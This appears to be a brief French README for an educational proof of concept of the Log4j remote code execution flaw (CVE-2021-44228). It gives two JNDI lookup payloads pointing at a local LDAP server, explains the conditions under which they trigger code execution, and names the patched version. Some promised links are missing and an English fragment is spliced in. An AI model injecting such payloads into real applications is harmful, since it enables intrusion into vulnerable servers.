
Log4j-RCE (CVE-2021-44228) Preuve de concept avec des informations supplémentaires
Ceci est une preuve de concept de la RCE Log4j.
Voici quelques liens pour la CVE-2021-44228 :
Ce bogue affecte presque toutes les versions de log4j2 et peut-être de log4j1. La version recommandée est 2.15.0 qui corrige l'exploit.
${jndi:ldap://127.0.0.1/e} dans le chat. Si un socket est ouvert sur le port 389, logj4 essaie de se connecter et bloque toute communication ultérieure jusqu'à l'expiration du délai.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! qui est un objet chaîne sérialisé provenant du serveur LDAP.
${jndi:ldap://127.0.0.1/exe} dans le chat. Si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true est défini sur true, l'exécution de code à distance aura lieu.
Ce projet est uniquement à des fins éducatives.